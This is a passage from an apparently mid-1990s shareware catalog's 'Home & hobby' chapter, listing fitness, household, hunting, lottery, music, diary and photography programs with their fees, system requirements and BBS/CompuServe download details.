recipes. + Easily group a series of recipes together into a single meal + and adjust servings to account for any yield. Prints shopping + lists, as well as individual recipes. Can retrieve and save + Meal Master text files. + + Chapter 15, "Home & hobby" 541 + + + + 15.10.2 Exercise/fitness + + Product: Bike + Author: Henning Associates (Michael R. Henning), 804-295-0554 + Version: 4.05 (04-26-96) + Needs: IBM 80386, Windows 3.1 or better. 200k RAM; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $15.00 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $3.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + page 6); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; BIKE40.ZIP on CompuServe + in CIS:WINSHAR forum LIBrary 0 (or contact userID 72176,2507 + for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Useful for the casual as well as the serious rider. Keep track + of miles ridden, average speed, average ride, etc. Display + information in numerical or graphics form. Print your ride log + and start with a fresh database every year. Features the + ability to customize two fields for your particular training + regimen. Data can be exported to another database program or + spreadsheet. + + + Product: Clickometer + Warns when keybd/mouse activity exceed limits. See full + description on page 123. + + Product: Discover Juggling 1 - Balls + Learn to juggle 3, 4, and 5 balls. See full description on + page 544. + + Product: Discover Karate 1 - White Belt + Learn Beginning Karate. See full description on page 575. + + Product: From Scratch recipe processor + Recipe database for Windows with nutrition. See full + description on page 537. + + Product: Program for a Small Planet + Finds healthy and delicious food combinations. See full + description on page 539. + + + 15.11 Household automation + + Product: Around The House + Complete personal/home information manager. See full + description on page 133. + + Chapter 15, "Home & hobby" 542 + + + + Product: Chores & Rewards + Author: K. Jeff Hayes, 919-365-6027 + Version: 1.00 (01-01-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, newsletter, mail support; + 3-month limited return policy; all ASP-wide offers (see + page 6). 3-month free upgrading allowed. 3 free update disk(s) + sent out. + Look for: availability unknown on BBSs; CHORES.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 71652,634 + for assistance). + Download size: 146k (about eleven minutes with a 2400 baud modem) + Description: + System for managing childrens chores, rewards and penalties + featuring: 3 motivation/compensation methods; automatic + compensation reconciliation; performance tracking; "bank + account" management; and checklist printing. + + + Product: From Diapers To Diplomas + An electronic 'Baby Book'. See full description on page 556. + + Product: JRE Home Inventory + Author: JRE Enterprises + Version: 6.3 (09-30-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; EGA + monitor; Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $18.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: HOMI63.ZIP on BBSs (call 602-814-0483 to download it at + no charge); HOMI63.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 225 + Download size: 520k (about 39 minutes with a 2400 baud modem) + Description: + Keeps track of all your household items for insurance purposes. + Eleven different types of reports with many options for + tailoring. True print preview, ability to change printer and + screen fonts, plus much more! Categorize items by location, + room, insurance category, and personal category. + + Chapter 15, "Home & hobby" 543 + + + + Product: Smart10 + Author: Sympathetic Software (Stephen L Billard) + Version: 2.1 (10-02-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. X10 PowerHouse CP290. + Registration fee: $20.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support. 36-month free + upgrading allowed. + Look for: availability unknown on BBSs; SMRTEN.ZIP on CompuServe + in CIS:PCHW forum LIBrary 4 (or contact userID 71046,1476 for + assistance). + PsL#: 10400 + Download size: 97k (about seven minutes with a 2400 baud modem) + Description: + Devised to overcome limitations of the CP290 and its software. + It maintains a year's calendar of events. Use Sunrise and + Sunset as times. Events can beconditioned to occur (or not) if + it is dark (or light), between dates you have specified, or on + command line parameters. + + Issue direct or delayed commands and cancel pending events. + Automate AUTOEXEC.BAT to compare the computer's date-time with + target date-times, and adjust clock for daylight savings time. + + + Product: SmartTracker Books + Track, catalog & organize your books. See full description on + page 520. + + Product: SmartTracker Inventory + Catalog, track & organize personal possession. See full + description on page 273. + + Product: WinPrice + Picks best deal from any two choices. See full description on + page 342. + + Chapter 15, "Home & hobby" 544 + + + + 15.12 How-to projects + + Product: Discover Juggling 1 - Balls + Author: Midi Age Productions (Miles Eddy) + Version: 0.97 (05-17-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; EGA monitor; + Hard disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $9.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; 1-month return policy; discounts on + other products. + Look for: availability unknown on BBSs. + Download size: 1270k (about 94 minutes with a 2400 baud modem) + Description: + Learn the basic steps of three, four and five ball juggling and + tricks. Using simple animations, text, and color photo + demonstrations, professional juggler Miles Eddy teaches this + fun and useful skill. For ages seven to adult. + + "Juggling really isn't as hard as it might look" says Miles + Eddy. "Fun and educational, learning to juggle is something + the entire family can enjoy and is like riding a bicycle. Once + you learn, you'll know how to juggle for the rest of your + life!" + + + Product: Discover Karate 1 - White Belt + Learn Beginning Karate. See full description on page 575. + + Product: Home Plan + Draw, print, edit & save house plans. See full description on + page 494. + + + 15.13 Hunting & fishing + + See also: Home & hobby, Sports, Firearms. + + Product: The Deer Expert + Author: Strat-Tech, Inc., 800-783-9544 + Version: 4.2 (05-01-94) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited tollfree 800# phone, CompuServe, mail + support; 1-month return policy; bonus data; all ASP-wide offers + + Chapter 15, "Home & hobby" 545 + + + + (see page 6); disks of other shareware; discounts on other + products. + Look for: DEERHU42.ZIP on BBSs; DEERHU.EXE on CompuServe in + CIS:OUTDOOR forum LIBrary 6 (or contact userID 72317,2332 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Editor's note: The author claims to accept local-currency checks + from non-U.S. customers. + Description: + Gives you over 100 methods for gun hunting of whitetail deer. + Has techniques for doe, small bucks, and recovery of wounded + deer. When you purchase you get bonus techniques for medium, + large bucks, recipes, and more. Also has a library of + information and an extensive logging facility! Valuable safety + information is a must! + + + Product: The Fish Expert + Author: Strat-Tech, Inc., 800-783-9544 + Version: 3.2 (05-01-94) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + 1-month return policy; bonus utilities; bonus data; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. 6-month free upgrading allowed. + Look for: FISHEX32.ZIP on BBSs; FISHEX.EXE on CompuServe in + CIS:OUTDOOR forum LIBrary 5 (or contact userID 72317,2332 for + assistance). + Download size: 140k (about eleven minutes with a 2400 baud modem) + Editor's note: The author claims to accept local-currency checks + from non-U.S. customers. + Description: + Contains fishing patterns and techniques as well as a fishing + log system. Recommended in Outdoor Life magazine and elsewhere. + You input conditions you fish under and program gives proven + methods to catch trout. Library, logs help you capture your own + data base. + + Chapter 15, "Home & hobby" 546 + + + + Product: Fishtime + Author: C & E Associates (Edward J. Panner) + Version: 3.5 (09-12-95) + Needs: IBM PC, DOS 2.0 or better. 100k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $15.00 + Registration benefits: printed manual; 6 months of unlimited + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 6). + Look for: FSHTME35.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 60k (about five minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Hunters and fisherman have long known that a relationship + exists between the phase and position of the moon and the + activity and feeding patterns of fish and game. This calculates + the best times to hunt and fish on any given day for any + location in the continental United States based on the phase + and position of the moon. The output is a graph plotted on the + screen showing the probability of success for the 24 hour + period selected. Prime time lists are also provided. + + + Product: QBALL + Small arms exterior ballistics. See full description on + page 570. + + + 15.14 Lottery + + Product: Lotto Prophet + Author: DataMicro, Inc., 813-629-7720 + Version: 5.0 (01-05-95) + Needs: IBM PC, DOS 2.11 or better. at least 1 720k floppy. + Registration fee: $19.50 + Registration benefits: + Look for: PROPHET5.ZIP on BBSs (call 813-766-0780 to download it + at no charge); PROPH5.ZIP on CompuServe in CIS:PCNEW forum + LIBrary 9 (or contact userID 71251,2123 for assistance); + PROPHET5.ZIP on GEnie in IBM forum LIBrary 7 (or contact userID + GDAVIS13 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Lotto Prophet Ver 5.0 Provides more HOT statistical algorithms + than any lottery program on the market today and has a history + of picking BIG winners. New instant State of Lottery Report. + Supports Pick 5,6,7, Keno & PowerBall. Reports by Trips, Quads, + PowerDue, Hot, Overdue, Most Likely, Friends & Fate. Complete + Data File Control. Wheeling Systems. Picks, Stores & Checks for + + Chapter 15, "Home & hobby" 547 + + + + WINNERS. LP has had winners in the USA, New Zealand, Canada, + Australia, Cyprus & Ireland. + + + Product: Lotto Thunder (PICK-6 Version) + Author: Charles P.Staats + Version: 1.4 (05-01-95) + Needs: IBM PC, DOS 5.0 or better. 640k RAM; CGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Epson printer; + EMS memory; XMS memory. + Registration fee: $20.00 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + CompuServe, newsletter, mail support; runtime license; + discounts on other products. + Look for: LOTTOT14.ZIP on BBSs; LOTT14.ZIP on CompuServe in + CIS:PCFUN forum LIBrary 9 (or contact userID 72747,2474 for + assistance). + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + A complete lotto prediction and number systems program. Has + four completely different methods of predicting lotto numbers. + Wheel systems up to 54 numbers, multiple level predictions, + save predictions, scan for winners, scan for past performance, + auto and manual execution of prediction methods, no game limit. + Pull down menus, in-memory scanning, support for expanded + memory. Graphs, pie, bar, line, and time-series graphs. + + + Product: Windows Lotto Pro + Author: Data Solutions, 813-651-1246 + Version: 3.5 (11-01-95) + Needs: IBM 80386, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $35.95 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 1-month return policy; bonus data; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 3-month free upgrading allowed. + Look for: LOTPRO35.ZIP on BBSs; LOTPRO35.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 6 (or contact userID 72356,354 for + assistance). + Download size: 522k (about 39 minutes with a 2400 baud modem) + Description: + Picks the best lottery numbers to play based on a statistical + analysis of previously drawn numbers. This is not a random + number generator. The numbers picked can be played in any of + the 25 wheeling systems included. The program also checks the + resulting tickets for winners. Includes many charts and graphs + to help you determine numbers that are hot, cold, due, + + Chapter 15, "Home & hobby" 548 + + + + repeating, etc. Compatible with all lotteries that pick 5 to 7 + numbers, including Powerball. + + + 15.15 Movies & video tapes + + Product: Have You Read That Movie? + Quiz/database: films based on literary works. See full + description on page 624. + + Product: SmartTracker Videos + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 2.5 (12-20-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy; all ASP-wide offers + (see page 6). + Look for: TKV250.ZIP on BBSs; TKVID.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Track, organize and catalog your video collection. Select + content (movie, TV, home video), format, category, rating, + personal rating, sound and more. Enter title, stars, producer, + tape number, counters, description and more. Modify categories + and personal ratings to your own liking. Advanced search + facility. 1-line, 2-line or multi-line reports sorted by title, + category, rating, year or personal rating. Narrow reports down + to just movies, TV shows or home videos and/or by one category + or rating. + + + Product: Video Librarian + Author: TurboSystemsCo (Lemuel D. Turner), 404-516-8575 + Version: 4.02 (12-31-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $34.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, GEnie, + mail support; bonus data; discounts on other products. + Look for: VLB402.ZIP on BBSs (call 703-680-9269 to download it at + no charge); VLB.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); VLB402.ZIP on + + Chapter 15, "Home & hobby" 549 + + + + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 273k (about 21 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + Full featured menu-driven database manager that catalogs video + libraries like no other. 14 database management functions + available from data entry screen. Holds 18 fields of + information about each title. Has very fast search and find + routines. Prints reports to the screen, printer or disk. Prints + labels on regular or custom labels for cassettes. Mouse + support, context sensitive help, moveable, re-sizeable browse/ + find screens. Memo field for movie synopsis. + + + Product: VideoMaster + Helping you *master your video collection. See full + description on page 523. + + Product: VideoMaster For Windows + Helping you *master your video collection. See full + description on page 523. + + + 15.16 Music + + See also: Education, Music. + + Product: AlbumMaster + Easily catalog your album collection. See full description on + page 512. + + Product: AlbumMaster For Windows + Helps you *Master your album library. See full description on + page 513. + + Product: AMF Intelligent Organ for Win + Author: AMF (Andrew M. Freeman) + Version: 2 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. sound card. + Registration fee: $11.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: ORGAN.ZIP on BBSs; ORGAN.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 7 (or contact userID 74250,1700 for + assistance). + SWREG#: 3236 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + A Casio-like organ synthesizer for Windows. Play 127 + instruments in 5 octaves with your mouse. Has recording and + playback capabilities. When playing back, it actually looks + + Chapter 15, "Home & hobby" 550 + + + + like someone is playing the piano. Easy to use. Realistic- + looking keyboard. + + + Product: CassetteMaster + The best way to catalog your cassettes. See full description + on page 513. + + Product: CassetteMaster For Windows + The best way to catalog your cassettes. See full description + on page 514. + + Product: CDMaster + Helping you to *master your CD library. See full description + on page 515. + + Product: CDMaster For Windows + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 3.10 (01-29-95) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; VGA monitor; + Dual 720k floppy drives; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; bonus utilities; bonus graphics; all + ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + Look for: CDMW310.ZIP on BBSs (multiple files) (call 317-784-2147 + to download it at no charge); CDM4W.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 7 (multiple files) (or contact userID + 70272,3317 for assistance). + Download size: 856k (about 64 minutes with a 2400 baud modem) + Description: + CD lovers need a program as sophisticated as the format itself + to catalog their collections. This is the answer! The program + is easy to use and powerful. Standard entries for title, + artist, CD number, category, and tunes (plus 3 user defined + fields! The user can obtain printouts for all or criteria, and + can search for all fields or combination, even tunes! Printouts + include: an abbreviated listing, full catalog, 3X5 and Rolodex + cards, front labels, and 3 different styles of complete tune + lists! + + + Product: MCBase + Relational music collection database system. See full + description on page 519. + + Chapter 15, "Home & hobby" 551 + + + + Product: MicroPlayerCD(tm) + Play audio CDs on your computer's CDROM drive. See full + description on page 72. + + Product: MOZART (Virtuoso Edition) + Author: David Webber + Version: 1.3 (01-03-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM. + Registration fee: $49.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of CompuServe, mail support; bonus data; + discounts on upgrades. Scores up to 64 staves; illustrated + help. + Look for: MOZART13.ZIP on BBSs; MOZART.ZIP on CompuServe in + CIS:MUSICA forum LIBrary 12 (or contact userID 100042,3516 for + assistance). + SWREG#: 4080 + Download size: 2000k (about 149 minutes with a 2400 baud modem) + Description: + A music processor for Windows 3.1. Using only the computer + keyboard, you can create, edit and print sheet music with high- + quality TrueType symbols. WYSIWYG. Its primary aim is to print + parts for musicians, but MIDI files can be exported to provide + an "aural preview" on multimedia PCs. Features include: instant + transposition; automatic default quaver (eighth note) tail + groupings; automatic bar-line entry; optional "swing" + interpretation; on-line help. + + + Product: Music Sculptor for Windows + Author: Aleph Omega Software, 403-257-2115 + Version: 1.4 (03-07-94) + Needs: IBM AT (80286), Windows 3.1 or better. 200k RAM; CGA + monitor; Mouse; sound card. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $24.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; lifetime return policy; bonus utilities; bonus data; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. + Look for: MUSIC14.ZIP on BBSs; MUS14.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 6 (or contact userID 72613,3574 for + assistance). + PsL#: 11251 + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A very easy to use MIDI sequencer with music keyboard window. + Record, edit, and play music. Works with any Windows- + compatible sound card or MIDI interface. Use with either + + Chapter 15, "Home & hobby" 552 + + + + external MIDI keyboard or music keyboard window which can be + played using mouse or computer keyboard. Attractive and fully + functional. MIDI files included. + + + Product: Musical Instrument Tuner + Author: SoundByte Software (Jeff O'Dair), 317-856-3860 + Version: 1.01 (02-23-94) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; Epson printer; sound card. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited phone, mail support. + Look for: TUNER101.ZIP on BBSs. + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Creates reference tones for tuning various musical instruments + such as guitar, banjo, violin and mandolin. There is also a + large selection of scales available for tuning other + instruments. Works with Sound Blaster or the PC speaker. + + + Product: A MUSICAL TUTORIAL + An excellent way to promote musical study. See full + description on page 472. + + Product: A MUSICAL TUTORIAL for Windows + An excellent way to promote musical study. See full + description on page 472. + + Product: MusicEase + Author: RMH Computer Services (Richard Holler), 317-782-9903 + Version: 4.2 (09-10-85) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Hard disk; HP LaserJet printer. + Registration fee: $49.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, BBS, CompuServe, + mail support; 3-month return policy; bonus utilities; bonus + + Chapter 15, "Home & hobby" 553 + + + + data; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: ME420.ZIP on BBSs (call 317-784-2147 to download it at + no charge); MUSCEZ.ZIP on CompuServe in CIS:PCFUN forum LIBrary + 4 (or contact userID 73567,1547 for assistance). + SWREG#: 1371 + Download size: 430k (about 32 minutes with a 2400 baud modem) + Description: + Formerly a successful commercial product, this music score + editor lets you create, edit, print and play music notation. + WYSIWYG screen oriented editor providing a constraint based + system with a large amount of knowledge of music notation. Will + intelligently handle many of the details of scoring + automatically. Can create professional looking scores easily + and quickly. Enter notes using the computer keyboard or by + playing them on a MIDI instrument (MPU-401 only). Can + transpose, invert and retrograde. + + + Product: NoteWorthy + Author: Braeburn Software (Bernard Hill), +44-1750-721854 + Version: 1.87 (12-29-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; EGA monitor; + Hercules monitor. + Strongly recommended: Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Registration fee: L-40.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; discounts on upgrades. + Look for: NW187*.ZIP on BBSs; NW187*.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 5 (or contact userID 100415,3372 for + assistance). + SWREG#: 3764 + PsL#: 11597 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + WYSIWYG music editor for the professionally-minded musician. + DOS-based, and supports Epson, IBM Proprinter, Canon, + Postscript, Laserjet, Canon LBP printers. Full set of musical + symbols on staves bound in any fashion into systems. Four fonts + for text work, justification and compression of staves. + Transposition (including any chord symbols used) and straight + lines and curves. Very easy interface, inc demonstration mode + and on-line tutorial. Does not play music, but is a high- + quality printing system. + + Chapter 15, "Home & hobby" 554 + + + + Product: SoundMasterDb + Author: TurboSystemsCo (Lemuel D. Turner), 404-516-8575 + Version: 2.02 (09-14-92) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $31.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: 51/4" master disk(s); 3 months of support; + discounts on other products; discounts on upgrades. + Look for: SND202.ZIP on BBSs (call 703-680-9269 to download it at + no charge); SND.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); SND202.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + Top rated audio librarian available. Handles all audio formats + (CDs, cassettes, albums, etc.) through its relational database + design. Advanced data input/display screen stores an unlimited + number of songs per side. Nine reports that can be indexed 6 + ways. Lists reports to screen, printer or disk. Quick find/ + search on single or multiple fields. Features context sensitive + help, online manual, screen saver, mouse support and much more. + + + Product: SoundZ + The ultimate music librarian. See full description on + page 522. + + Product: SoundZ For Windows + The ultimate music librarian. See full description on + page 522. + + + 15.17 Personalities + + Product: By the Numbers + Personality analysis with Numerology. See full description on + page 526. + + Product: JailBird + Create & print vanity license plate replicas. See full + description on page 488. + + Chapter 15, "Home & hobby" 555 + + + + Product: The Richard Webster System + Author: R.K. West Consulting (Rosemary K. West) + Version: 4.1 (09-30-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: EGA monitor; Hard disk; HP LaserJet + printer. + Registration fee: $0.00 + Registration benefits: + Look for: WEB41.ZIP on BBSs; WEBSTR.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Based on the work of internationally-know psychic entertainer + Richard Webster, "Aura Reading" helps you learn what to look + for when attempting to see the human aura. "Quick Numerology" + helps you put together a short but pointed personality profile + using someone's date of birth. It's a fascinating way to + understand more about those around you. Great fun at parties! + + + Product: Your ESP Test + Find out if you have psychic powers! See full description on + page 531. + + 15.17.1 Diaries & journals + + Product: Dear Diary + Diary/daily journal. See full description on page 146. + + Product: From Diapers To Diplomas + Author: BlueCollar Software (Bill Sturgell), 513-652-1353 + Version: 2.2 (12-22-95) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Hard disk. + Registration fee: $19.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, BBS, + CompuServe, mail support; 3-month limited return policy; all + ASP-wide offers (see page 6); discounts on upgrades. 3-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DIADIP22.ZIP on BBSs; DIADIP.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 17 (or contact userID 72630,1714 for + assistance); DIADIP22.ZIP on GEnie in UNKNOWN forum LIBrary 0 + (or contact userID NONE for assistance). + Download size: 291k (about 22 minutes with a 2400 baud modem) + Description: + Keeps track of Birth Information, Vital Statistics, Growth + Records, Medical and Dental Records, Friends, Teachers, Awards, + Accomplishments, etc. It will print out many reports. For + instance, it is simple to create a report to list every visit + to the dentist pertaining to any child's braces in 1995. This + program is very easy to learn and use. It will run on any IBM + + Chapter 15, "Home & hobby" 556 + + + + PC, and will work with any printer and monitor. Though DOS + based, it will run in Windows. + + + Product: My Life + Author: JRE Enterprises + Version: 2.2 (09-30-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; EGA monitor; + Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $32.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: MYL22.ZIP on BBSs (call 602-814-0483 to download it at + no charge); MYL22.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 2155 + Download size: 1405k (about 105 minutes with a 2400 baud modem) + Description: + A personal diary, journal, scrapbook, and word processor for + Windows. The scrapbook can be used to store and play movies and + sounds. Pictures can also be stored and viewed. Multiple + databases can be created, one for each member of the family, + and each database can be password protected. + + Chapter 15, "Home & hobby" 557 + + + + 15.18 Photography + + Product: EZ-Index - Popular Photography + Author: E-Z Access Software Ltd. (Leo Taylor), 506-529-3432 + Version: 1.90 (10-10-95) + Needs: IBM PC, DOS 3.1 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Epson printer; EMS memory; XMS + memory. + Registration fee: $7.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, BBS, + CompuServe, mail support; 3-month return policy; discounts on + other products; discounts on upgrades. + Look for: PPINDX10.ZIP on BBSs (call 506-529-4067 to download it + at no charge); PPINDX10.ZIP on CompuServe in CIS:PHOTOFORUM + forum LIBrary 13 (or contact userID 74002,1261 for assistance). + SWREG#: 8576 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Reference index for POP PHOTO magazine. Features: word search, + print, color and install options. Keywords have been added + where required to help locate (topics) articles of interest. + The products reviewed in the articles dealing with trade shows + are listed, plus the JUST OUT, HELP! and TOO HOT TO HANDLE + feature. Available in two versions with updates available. + Setup instructions for Windows 3.1 & 95 is provided. + + + 15.19 Planes, trains & automobiles + + Product: Car Restoration Diary + Data tracking for vintage auto restoration. See full + description on page 220. + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 277. + + + 15.20 Quotes & anecdotes + + See also: Data, Quotes & anecdotes. + + Product: Jokes & Quotes + Network/standalone daily message system. See full description + on page 369. + + Chapter 15, "Home & hobby" 558 + + + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 605. + + + 15.21 Reading (and writing, too) + + Product: Creativity Package + Become more creative & improve your writing. See full + description on page 197. + + Product: Have You Read That Movie? + Quiz/database: films based on literary works. See full + description on page 624. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 438. + + Product: Poetry Generator + Turn your computer into a 